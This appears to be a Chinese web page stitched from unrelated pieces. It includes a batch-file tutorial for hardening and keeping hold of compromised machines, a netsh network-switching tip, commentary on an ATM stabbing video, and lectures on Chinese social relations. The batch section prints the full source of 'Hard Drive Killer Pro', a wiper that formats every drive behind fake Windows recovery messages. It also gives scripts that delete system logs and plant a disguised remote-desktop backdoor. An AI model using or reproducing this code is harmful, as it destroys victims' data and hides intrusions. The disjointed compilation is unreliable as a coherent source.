@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:winntsystem32windrv32.exe
@regedit /s patch.dll
@delete patch.dll

@REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动]
@REM 这样不是更安全^_^.

六.精彩实例放送
1.删除win2k/xp系统默认共享的批处理
———————— cut here then save as .bat or .cmd file —————————

@echo preparing to delete all the default shares.when ready pres any key.
@pause
@echo off

:Rem check parameters if null show usage.
if {%1}=={} goto :Usage

:Rem code start.
echo.
echo ——————————————————
echo.
echo Now deleting all the default shares.
echo.
net share %1$ /delete
net share %2$ /delete
net share %3$ /delete
net share %4$ /delete
net share %5$ /delete
net share %6$ /delete
net share %7$ /delete
net share %8$ /delete
net share %9$ /delete
net stop Server
net start Server
echo.
echo All the shares have been deleteed
echo.
echo ——————————————————
echo.
echo Now modify the registry to change the system default properties.
echo.
echo Now creating the registry file
echo Windows Registry Editor Version 5.00> c:delshare.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters]>> c:delshare.reg
echo "AutoShareWks"=dword:00000000>> c:delshare.reg
echo "AutoShareServer"=dword:00000000>> c:delshare.reg
echo Nowing using the registry file to chang the system default properties.
regedit /s c:delshare.reg
echo Deleting the temprotarily files.
del c:delshare.reg
goto :END

:Usage
echo.
echo ——————————————————
echo.
echo ☆ A example for batch file ☆
echo ☆ [Use batch file to change the sysytem share properties.] ☆
echo.
echo Author:Ex4rch
echo Mail:[email protected] QQ:1672602
echo.
echo Error:Not enough parameters
echo.
echo ☆ Please enter the share disk you wanna delete ☆
echo.
echo For instance,to delete the default shares:
echo delshare c d e ipc admin print
echo.
echo If the disklable is not as C: D: E: ,Please chang it youself.
echo.
echo example:
echo If locak disklable are C: D: E: X: Y: Z: ,you should chang the command into :
echo delshare c d e x y z ipc admin print
echo.
echo *** you can delete nine shares once in a useing ***
echo.
echo ——————————————————
goto :EOF

:END
echo.
echo ——————————————————
echo.
echo OK,delshare.bat has deleted all the share you assigned.
echo.Any questions ,feel free to mail to [email protected].
echo
echo.
echo ——————————————————
echo.

:EOF
echo end of the batch file
———————— cut here then save as .bat or .cmd file —————————

2.全面加固系统(给肉鸡打补丁)的批处理文件
———————— cut here then save as .bat or .cmd file —————————

@echo Windows Registry Editor Version 5.00 >patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters] >>patch.dll

@echo "AutoShareServer"=dword:00000000 >>patch.dll
@echo "AutoShareWks"=dword:00000000 >>patch.dll
@REM [禁止共享]

@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] >>patch.dll
@echo "restrictanonymous"=dword:00000001 >>patch.dll
@REM [禁止匿名登录]

@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetBTParameters] >>patch.dll
@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll
@REM [禁止及文件访问和打印共享]

@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices@REMoteRegistry] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSchedule] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] >>patch.dll
@echo "ShutdownWithoutLogon"="0" >>patch.dll
@REM [禁止登录前关机]

@echo "DontDisplayLastUserName"="1" >>patch.dll
@REM [禁止显示前一个登录用户名称]
@regedit /s patch.dll

———————— cut here then save as .bat or .cmd file —————————

下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnal service留跳后路。
@regedit /s patch.dll
@net stop w3svc
@net stop event log
@del c:winntsystem32logfilesw3svc1*.* /f /q
@del c:winntsystem32logfilesw3svc2*.* /f /q
@del c:winntsystem32config*.event /f /q
@del c:winntsystem32dtclog*.* /f /q
@del c:winnt*.txt /f /q
@del c:winnt*.log /f /q
@net start w3svc
@net start event log
@rem [删除日志]

@net stop lanmanserver /y
@net stop Schedule /y
@net stop RemoteRegistry /y
@del patch.dll
@echo The server has been patched,Have fun.
@del patch.bat
@REM [禁止一些危险的服务。]

@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] >>patch.dll
@echo "PortNumber"=dword:00002010 >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp >>patch.dll
@echo "PortNumber"=dword:00002012 >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuService] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo "ErrorControl"=dword:00000001 >>patch.dll
@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00, >>patch.dll
@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65, >>patch.dll
@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll
@echo "ObjectName"="LocalSystem" >>patch.dll
@echo "Type"=dword:00000010 >>patch.dll
@echo "Description"="Keep record of the program and windows’ message。" >>patch.dll
@echo "DisplayName"="Microsoft EventLog" >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicestermservice] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@copy c:winntsystem32termsrv.exe c:winntsystem32eventlog.exe
@REM [修改3389连接,端口为8210(十六进制为00002012),名称为Microsoft EventLog,留条后路]

3.Hard Drive Killer Pro Version 4.0(玩批处理到这个水平真的不容易了。)
———————— cut here then save as .bat or .cmd file —————————
@echo off
rem This program is dedecated to a very special person that does not want to be named.
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
call attrib -r -h c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo call format c: /q /u /autoSample >nul >>c:autoexec.bat
call attrib +r +h c:autoexec.bat >nul
rem Drive checking and assigning the valid drives to the drive variable.

set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z

rem code insertion for Drive Checking takes place here.
rem drivechk.bat is the file name under the root directory.
rem As far as the drive detection and drive variable settings, don’t worry about how it
rem works, it’s d*amn to complicated for the average or even the expert batch programmer.
rem Except for Tom Lavedas.

echo @echo off >drivechk.bat
echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat

cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem When errorlevel is 1, then the above is not true, if 0, then it’s true.
rem Opposite of binary rules. If 0, it will elaps to the next command.

echo @prompt %%%%comspec%%%% /f /c dir %%%%1:./ad/w/-p $b find "bytes" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat

cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if errorlevel is 1, then the drive specified is a removable media drive – not ready.
rem if errorlevel is 0, then it will elaps to the next command.

echo @prompt dir %%%%1:./ad/w/-p $b find " 0 bytes free" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat

cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if it’s errorlevel 1, then the specified drive is a hard or floppy drive.
rem if it’s not errorlevel 1, then the specified drive is a CD-ROM drive.

echo :enddc >>drivechk.bat

rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".

rem Now we will use the program drivechk.bat to attain valid drive information.

:Sampledrv

for %%a in (%alldrive%) do call drivechk.bat %%a >nul
del drivechk.bat >nul
if %drive.==. set drive=c

:form_del
call attrib -r -h c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat
echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga >nul >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a: >nul >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat
echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga >nul >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a: >nul >>c:autoexec.bat
echo cd >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Welcome to the land of death. Munga Bunga’s Multiple Hard Drive Killer version 4.0. >>c:autoexec.bat
echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:autoexec.bat
echo echo 1. To make people aware that security should not be taken for granted. >>c:autoexec.bat
echo echo 2. Love is important, if you have it, truly, don’t let go of it like I did! >>c:autoexec.bat
echo echo 3. If you are NOT a vegetarian, then you are a murderer, and I’m glad your HD is dead. >>c:autoexec.bat
echo echo 4. Don’t support the following: War, Racism, Drugs and the Liberal Party.>>c:autoexec.bat

echo echo. >>c:autoexec.bat
echo echo Regards, >>c:autoexec.bat
echo echo. >>c:autoexec.bat
echo echo Munga Bunga >>c:autoexec.bat
call attrib +r +h c:autoexec.bat

:makedir
if exist c:temp.bat attrib -r -h c:temp.bat >nul
echo @echo off >c:temp.bat
echo %%1: >>c:temp.bat
echo cd >>c:temp.bat
echo :startmd >>c:temp.bat
echo for %%%%a in ("if not exist %%2nul md %%2" "if exist %%2nul cd %%2") do %%%%a >>c:temp.bat
echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! >>c:temp.bat
echo if not exist %%1:%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2nul goto startmd >>c:temp.bat
call attrib +r +h c:temp.bat >nul

cls
echo Initializing Variables . . .
rem deltree /y %%a:*. only eliminates directories, hence leaving the file created above for further destruction.
for %%a in (%drive%) do call format %%a: /q /u /autoSample >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
for %%a in (%drive%) do call c:temp.bat %%a Munga >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
for %%a in (%drive%) call attrib -r -h %%a: /S >nul
call attrib +r +h c:temp.bat >nul
call attrib +r +h c:autoexec.bat >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .

for %%a in (%drive%) call deltree /y %%a:*. >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .
echo Starting Application . . .
for %%a in (%drive%) do call c:temp.bat %%a Munga >nul

cls
echo Thank you for using a Munga Bunga product.
echo.
echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius.
echo.
echo Here is a joke for you . . .
echo.
echo Q). What’s the worst thing about being an egg?
echo A). You only get laid once.
echo.
echo HAHAHAHA, get it? Don’t you just love that one?
echo.
echo Regards,
echo.
echo Munga Bunga

:end

rem Hard Drive Killer Pro Version 4.0, enjoy!!!!
rem Author: Munga Bunga – from Australia, the land full of retarded Australian’s (help me get out of here).

假设你有一台笔记本,装有win2000/xp,经常在家与公司之间移动,两个地方需要不同的网络配置,每次改来改去实在麻烦,因此想找一个偷懒的办法,最后一次搞定,简单省事.下面就是一个好的办法.

1.将你的机器设置成在公司中使用的网络配置,打开命令行,使用如下命令:

netsh -c interface dump >c:gs.txt

2.将你的机器设置成在家中使用的网络配置,打开命令行,使用如下命令:

netsh -c interface dump >c:jia.txt

3.以后,将你回到公司要使用公司的配置时,使用如下命令:

netsh -f c:gs.txt

回到家要使用家中的配置时,使用如下命令:

netsh -f c:jia.txt

4.如果还觉得麻烦,那干脆搞个批处理好了.

txt如下:
#========================
# 接口配置
#========================
pushd interface

reset all

popd
# 接口配置结束

# ———————————-
# 接口 IP 配置
# ———————————-
pushd interface ip

# "本地连接 2" 的接口 IP 配置

set address name = "本地连接 2" source = static addr = 192.168.0.40 mask = 255.255.255.0
set address name = "本地连接 2" gateway = 192.168.0.1 gwmetric = 1
set dns name = "本地连接 2" source = static addr = 192.168.0.40
add dns name = "本地连接 2" addr = 192.168.0.1
set wins name = "本地连接 2" source = static addr = none

点击观看视频录像:

http://fkz.lamost.org/download/jiankong.wmv
[点击打开媒体文件,注意此文件可能含有不安全内容]

惊!才晚上7点多,歹徒就敢如此嚣张,这不是给我们狠狠地敲响了警钟吗?!一般人的惯性思维是认为夜深才会有夺命歹徒出没(请注意是“夺命”),尤其是在自动银行这样人流量不算少的公共地方。这个视频我反复看了10遍。心想,当时如果换成是我在场取钱,估计也是TMD的死路一条。歹徒从抱住受害人——推到墙角——捅刀子,这个过程只有3秒钟。3秒钟就要了一个人的命!!!!

用现在比较时髦的一个词来说,就是歹徒和取钱人的信息“不对称”。歹徒目的非常明确:用刀捅死你!而那个取钱人感觉是:这个人可能(只是可能还不明确)想抢钱?根本不知道是自己会被杀。所以他做出的行为是:输错密码让卡被吞(目的是让歹徒抢不到钱)。这其实是一厢情愿的做法,当吐出纸条时,歹徒抱他,他心中可能还舒了一小口气,认为你这下拿不到钱了,你丫的还能怎样??打就打,我怕你啊!!但是他想错了,歹徒直接要的是他的命!!就这么直接干脆迅速。从回放镜头看,歹徒抱住他,他一回身打了一记右摆拳,但打空了被歹徒卡住脖子迅速推到墙壁,然后就是大力捅刀子,直接致命。令人震撼的3秒钟啊!令人唏嘘不已的3秒钟啊!

他到死可能都没弄明白,为什么会这样??会这么快就被捅死??这就是信息不对称的结果。我想,如果时光能倒退回去,让受害人从头再做一次,他肯定不会这么处理。我想他一定不会把卡插进去,肯定会走到一旁,示意让歹徒先取款,说自己在等人。我想这种情况下,歹徒一般不会拔出刀行凶,因为抢钱的目的没达到。然后在电话里说你到了吗,对,就这个自动银行,你在对面啊,好,我出来接你之类的,然后走出去。(大家说这个办法好吗?)

如果已经把卡插进去了,怎么办,是不是应该重重拍一下取款机台说:TMD的,取款机又没钱,然后迅速回头跟歹徒说,操他吗的,真衰!!就这么看着歹徒的眼睛果断走出门去。我想歹徒在短短的时间内也难判断是否该拦住他,还是捅他?因为没钱啊!对吧

假设最坏的结果是,歹徒不管有没钱,都掏出刀子捅,那就看你造化了,你不可能再像那位仁兄一样,只是推推搡搡,不痛不痒的迎击,等着被捅死。你肯定会奋尽全力一搏,比如用腿狠揣歹徒腹部或其下身,阻击他不让靠近,一边伺机开门逃出去。这时候为了命,你什么都做的出,因为你已经知道不是生就是死!!!死死盯住他的持刀那只手,找准机会抓住其手臂,然后用头猛撞歹徒的面部,用牙咬他的鼻子或耳朵,用另一只手抠他的眼珠子,我想这时候用什么招都行,关键要实用(就是迅速让歹徒失去战斗力)!

非常惋惜那位受害人,如果时光倒退一点点,歹徒抱住他的腰,我想正确的做法应该是迅速回身(他做到了),关键是要紧紧抓住歹徒的双手腕(他没做到),目的是让他捅不了刀子,然后用额头猛烈撞击歹徒鼻子,狠咬歹徒的脸肉,受害人死就死在他以为只是一般的打斗,不知是要他的命!这个案例给我们很大的启示:
1、尽量不在夜间取款。
2、要取就到人多的地方取。
3、碰到有可疑的人在身后,迅速离开,不要取款。
4、如果在取款的时候突然有人抱住你,你只能尽全力一搏了,撕咬、踢裆、头撞、背摔,看你造化了

我非常憎恨这个穷凶极恶的歹徒,为受害人感到无比悲伤,这是一个活生生的例子,每个人都有可能碰到,不是你死就是歹徒死,当你面对这种险情时,你准备好了吗?

第一讲  中国人为什么一切靠关系
1、一般讲人际关系就是人跟人之间的关系,其实不是这样的。人际关系是你跟你自己的关系。只要你跟你自己处得好,你跟所有的人都处得好。我们现在就是不了解自己,跟自己处不好,天天生自己的气,天天捣自己的蛋。我是看了30年,我觉得每个人都是一种专家,什么专家?叫做整自己的专家。基本上你整不了别人,只有整自己。

2、成果管理好不好?标准答案是三个字:很难讲。你说他好,人家觉得很奇怪,“这是什么好?这就是不择手段。”;你如果说他不好,他就觉得这有什么不好,搞了半天没有成果,那不是白搞了。

3、我们中国人的事情,是永远也讲不清楚。一讲清楚,就有偏差,就不对了。

4、成果、结果、效果是从关系来的。关系一好,他成果就好;关系一好,绩效就高;关系良好的时候,成果自然就显著。

5、管理就是搞关系。财物管理就是把人跟钱的关系搞好;生产管理就是把人跟物料的关系搞好,它就变成了好的产品。任何事情都是关系所产生的,这是不可能例外的。

6、关系是多方面的,不是单方面的;关系是可以变化的,不是固定的;关系是动态的,不是静态的。所以关系可好可坏可大可小。但是,关系不是越来越好,就是越来越坏。世界上很少能够维持现状的,凡是喜欢维持现状的,都是自己欺骗自己。你的身体可以维持现状吗?不能。你不是越来越健康就是越来越衰弱,所以我们必须花时间去调整各种关系。关系是由自己发动的,由自己控制的。

7、电脑是没有灵感的,但人是有灵感(第六感)的,我们很多关系其实是靠灵感,不是靠五官的感觉。所以当你喜欢一个人的时候,你根本说不出来‘为什么喜欢他’,凡是说得出来的都是有条件的,有条件的都是不纯真的,不纯真都是很虚伪的,很虚伪都是很短暂的,因为条件为变,条件一就,你就完了。“我为什么喜欢你?”,“因为你长得很帅”;可是五年以后,你就不帅了,五年以后你弯腰驼背了,说不定一场病就把你变得一点不帅了,那我就不喜欢你了吗?可见这是有条件的。

8、机会也得靠关系。只要你关系够,你机会就比别人多;只要你关系够,你看不到的机会,人家会告诉你;只要你关系够,你随便一抓,机会就被你抓住了;你关系不够,两手怎么拼命地抓,就是抓不到。

9、“中国式人际关系曾氏三宝典”(原文为几个法则):中国式人际关系是不讨好,不拍人家马屁,不欺骗。

第一,不能讨好别人。中国人很敏感,怀疑心很重,很不容易被讨好,人际关系不是讨好别人。你讨好他,只能让他怕你,只能让他对你拉出更远的距离,最后吃亏的还是你。

第二,不能拍马屁。中国人没有马屁文化。良好的人际关系不是靠拍马屁,而是靠制造很浓厚的马屁味道,这是很高超的功力。你拍马屁拍到你的领导发现你在拍马屁,你就完了,你死定了;你拍到那个马屁味道很浓,但是他不觉得你在拍马屁,他觉得很受用,你就成功了。学生问我,应不应该拍马屁。我的标准答案是:“如果你抓马屁拍到所有人都知道你在拍马屁,那你就不要拍,因为这个没有好处;如果你有本事拍到好像没有拍一样,赶快去拍。”

第三,不要欺骗。欺骗是没有良心,没有人格。我们常常讲不实在的话,原因是基于不要让对方不生气,尊重对方,但是一定要保证后来那个成果是很美满的。

10、赞美一个外国人,很简单,赞美就行了;可是赞美一个中国人,可要小心,他会认为你在讥笑他。我们赞美跟讥笑其实是一样的。“哎唷!你越长越漂亮!”她心里想,说我丑就说我丑嘛,干嘛讲这种话呢。

11、一个对自己不负责的人,他会到处去讨好别人,讨好别人就是你对自己不负责任。

12、不走正道的关系比没有关系更糟糕。

13、成功=努力+机会+关系。努力和机会是不够的。努力跟机会还要加上关系,否则有机会,很努力,还是不可能成功,可见关系是很关键性的东西。关系是每一个人都免不了的,因为人不可能单打独斗,尤其今天讲究的是一个团队。团队就是靠关系,所以中国人动不动就要讲巩固领导中心,可见领导是靠团队的,不是团队靠领导。这个谁靠谁要搞清楚,一辈子多找几个人来靠,你就比较轻松。所有的人都靠在你身上,你迟早被累死。所以关系,其实质就是多找几个人来靠,但是这是勉强不得的,他是很自然的。一步一步积累成功的。

 

第二讲 
1、我们中国人了不起的地方是:外方内圆。什么是圆?圆是圆通,圆满,圆融,绝对不圆滑。更清楚地说,圆就是大的方,你看,方方方,方得很大的时候,很大的方就跟圆很接近了,就变圆了。

2、我不去讨好别人,因为我没有必要;我不拍马屁,因为我是一个堂堂正正的人;我不撒谎不欺骗,因为我不做那些没良心的事。

3、我们内心很有原则,但不能表现出来,表现出来就跟人家格格不入。所以,你外面表现要随和一点,但不能表现你内容的原则。

4、人际关系的十大要决:一表人材,二套西装,三杯酒量,四圈麻将,五方交游,六出祈山,七术打马,八口吹牛,九分努力,十分忍耐。

一表人材:一个人长成什么样是父母给的。18岁之前不要挑剔自己的长相,不要对美有固定的标准。别用第一印象去论定别人,但别人却用第一印象来论断你。不管父母生我什么样,我要让别人很乐意跟我交朋友。“要使自己从内心来改变外貌”。将自己练成一个强有力的磁铁,吸引许多人来和你在一起,那你就成功了。

二套西装(在什么场合穿什么衣服):跟别人配合是成功的基础之一。随和一点,人生别太自我设限,给自己更大的弹性空间。让别人对我们有好的印象。

三杯酒量(互动的原则):做任何事都要适可而止;做任何事都有要适量且量力而行。从人际交往中了解别人的个性。

四圈麻将(现代社交活动):一个人要培养一些适当的社交活动,但不要变成嗜好,赢的要装作没赢,让对方输得有面子,输了装作没输,增加互动的乐趣。常做一些有益身心的社交活动,娱乐自己,又可以增广人脉。

五方交游(东南西北中五方):一个人不要故步自封,多结交各种行业的朋友。一个人想要成功,则须建立广阔的人脉,多和异业交流,增广见闻。

六出祈山(运作的技巧):诸葛亮为灭魏国六次出师,明知其不可为而为之,不屈不挠,经得起打击。做人不须常常承认失败或是认输,而是要勇于承认错误,力求改进与补救。因比较重要,只要努力,尽力的去做,至于结果是如何,则不需太计较。经不起风吹草动,流言中伤的友谊不是真友谊。

七术打马(诚心的赞美别人):拍马屁的哲学,让别人不易察觉则可尽力去拍,人人皆看得出则不可为之。术——是一种技巧,要合情合理的情况下,常常赞美别人,常利用向人讨教的机会达到赞美别人的目的。一个人要能够常常欣赏别人的长处,赞美别人。

八口吹牛:适当的出风头,多为自己营造一些表现自我的机会,英雄不提当年勇,别老吹同样的牛,否则反遭人贻笑。不会赞美别人的人,则别人也不愿意听你吹牛。先看得起别人,然后才看得起自己,先把人做好,然后才把事情做好。

九分努力(做事的态度):把事情做好是最基本的条件,做人是做给别人看,做事是做给自己看。一个人努力不努力,只有自己知道,别人是不知道的。做人不以成败论英雄,做事则“胜者为王,败者为寇”,好好做人,是为了好好做事。

十分忍耐(做事的态度、持续忍耐方可成功):心上一把刀,体会忍耐的真义,忍人所不能忍,才是能成功的人。将忍耐培养成习惯。别人让你难堪,则需要先检讨自己。

5、人有两面,一个是表面,一个是里面。人经常是表里不一样的。所以,在看人时,要先看他的表面,再看他的里面。一表人才的内涵是靠内心的修养慢慢把里面表露出来。

6、人际关系是不能打草惊蛇的。放长线钓大鱼,这样才能钓到大鱼,你很急的都是抓小虾回来。我们这点跟日本式美国式意大利式是不一样的。西方人比较急,他要立竿见影,要马上有效果,那是钓不到大鱼的。一般情况下,钓到一条大鱼之后,他会跟你推荐300个潜在的顾客。

7、贵人额头上是没有标记我。所以我劝各位把认识的人都当作贵人,你就一个也跑不掉了。

8、拍马屁的最高境界:拍到好像没有拍一样。举例来说,领导说完一句话,你就说,“这是一个非常明智的决定,我们非照这样去做不可。”那就是拍马屁,拍到大家听的都很不受用,甚至于会起鸡皮疙瘩。下一次领导说了一番话以后,你说,像这样的话,我们很多问题都可以化解掉了。有的人说,怎么我想了半天,就没有想到这套主意了。

9、功劳是让出来的,让来让去,大家都有功劳;抢来抢去,谁都没有功劳。因为他当面让你抢走,背后会把功劳抢回去的。记住:关系有人前和背后。记住一句话,要人捧人,不要人损人,人损人最后是损自己,人捧人就是捧自己。

10、忍耐远比努力重要。一个人,只要没有耐心,只要不能够忍耐,前面的九个统统等于零。要记住一句话,心好是没有人知道的,脾气不好是所有人马上就能感觉得到的。所以忍辱功是最难修的。忍者,心上有把刀。李世民,忍魏征,成为中国古代最有名的帝王之一。

 

第三讲
1、我们现在所看的书,大部分是西方的,几乎管理方面的书,都是从西方翻译过来的。而且我们满脑子都是要跟国际接轨,那为什么还得研究中国人的东西呢?结果是:一个是做不到,一个是没有必要。

先说为什么做不到?西方文化有三个基础,一个是法律,一个是宗教,一个是科学。

在西方,一般一个国家只信一种宗教,叫做国教。中国有宗教,但没有国教。西方人,一个家庭信一种教,一个地区信一种教。西方打仗,是不同地区的人打,因为信不同的教。中国人不信宗教还好,一信宗教就开始家庭破裂,各人一条心。我们没有国教的原因是:我们有自己的人情世故,西方没有人情世故,西方人大家一起来相信上帝。中国人也会说,我也相信上帝啊。只不过我的上帝和你的上帝不一样。

再说法律。西方的文字定下来的法律,几乎只有一个解释。用中国文字来定法律,那有七八种解释。因为中国的文字弹性太大,定了跟没定一样。所以我们很少去看有什么规定。我们都知道,要按规定去做,但我们不会完全按照规定处理问题。因为我们会变通,变通到好像没有规定一样。

再说科学。我们有阴阳文化。当我们说赞成的时候,我们会反对;当我们说反对的时候,我们又会赞成。

3、宗教。西方人会真正的信仰宗教,中国人多半在利用宗教。在中国,真正相信的反面会吃亏,那些利用宗教来装神弄鬼的人会得到很多好处。宗教,多半被利用宗教的人扭曲掉,搞得乱七八糟。几乎所有的宗教一进入中国,就会变得不一样了。任何东西到了中国人手上,没有变才怪。

4、中国文化有两个基本的东西,一个道德,一个艺术。如果大家不讲究道德良心的话,谁都拿中国人没办法。只要你说,道德无所谓,道德看不见,良心算什么。这种情况对领导人来说,是最不利的。因为法律约束不了坏人,法律只能限制好人。

5、什么叫基督教?就是礼拜一到礼拜六多做点坏事情,把它积累起来,礼拜天才有足够的资料去忏悔。要不然,礼拜天到了教堂没有事情可做。

6、凡是有形的,对中国人几乎都没有太多的用处;凡是看得见摸得着的东西,都是一阵子不见了,不持久;真正长期存在的,都是那些看不见的东西,摸不着的东西。所以西方的文化很具体,中华文化不具体。

7、什么叫中华文化?中国人厉害的地方就是:没有一样东西代表中华文化。所有我们能讲得出来的东西,没有一样能够代表中华文化,这是我们最了不起的地方。因为我们一直变不停地变,变到连一套衣服也没有。每个国家都有自己的一套衣服,中国就是没有。长衫马褂是满族人的衣服,不一定是中国人的衣服。一个民族变到连自己的衣服都没有,真是会变的。不停地变才会不停地变化,才会进步,一旦固定下来你就完了。所以中华文化,是在不停地变化。不停地变化,变到外国人看不出来你在变,这个就叫中华文化。

8、在求真与求善两方面,西方人偏重于求真,我们偏重于求善。我们真不真,其实不是很重要。你看,西方人看历史人一定要求真,真实是怎么样,你就写怎么样。中国很少,尤其是自传。人家外国人写自传,写他的丑闻,写他的乱七八糟,中国人自传,都是把他写得很完美。

9、中国人为了求善(圆满),往往为讲一些不真实的话,但是不代表欺骗。所以同样诚信两个字,西方人认为你不讲实在话,就是不诚不信;中国人认为我没有讲实在话,我是有苦衷,到最后你会谅解。因为这样比较圆满。

10、人生一定是很真实的吗?不见得。我问你,“吃饱了没有?”你说,“吃饱了。”这分明是骗人,你怎么知道你吃饱了?吃饱没有的最佳测量方法是称。

11、西方人喝酒是自己倒,要喝多少就倒多少,要喝什么酒就自己倒,他们一桌吃饭,可以各喝不同的酒。因为我喜欢这种酒,你喜欢那种酒,我们彼此尊重,我不劝你,你不劝我,所以自己倒自己喝。中国人,自己倒自己喝,叫喝闷酒。外国人经常有疑问,“你们中国人是不是好男友才一起喝酒啊?”我说,“当然了。”他说,“那就怪了。好朋友还拼命要把他灌醉,算好朋友吗?”中国人就是好朋友,我才灌你啊,交情不够我还懒得灌你呢。

12、外国:赢拳赢酒;中国:赢拳输酒。

13、西方社会叫个人主义,他只有自己的感觉,他不在乎别人的感觉。所以发展出来的人际关系是对等的,很少有佬互动;他们所说的互动其实是礼貌而不是关心。中国人是讲实际的。一旦形式化起来以后,别人就觉得你虚伪。西方人有礼貌就是有修养,中国人有礼貌往往就是虚伪。

14、人与人之间的关系,西方是个体的,一个一个的。中国人其实是整体的,因为我们人太多。中国人是不想跟别人打交道都困难,西方人是想跟别人打交道都没有机会。这是两种不同的社会背景。为什么西方人一见面就拥抱?因为他已经三个月没有看到人了,好不容易看到一个,不抓你一下,摸你一下,哪里知道你是人呢?中国人,眼睛所能看到的都是人,见面还要“Hi!Hello!”别人会认为是神经病。

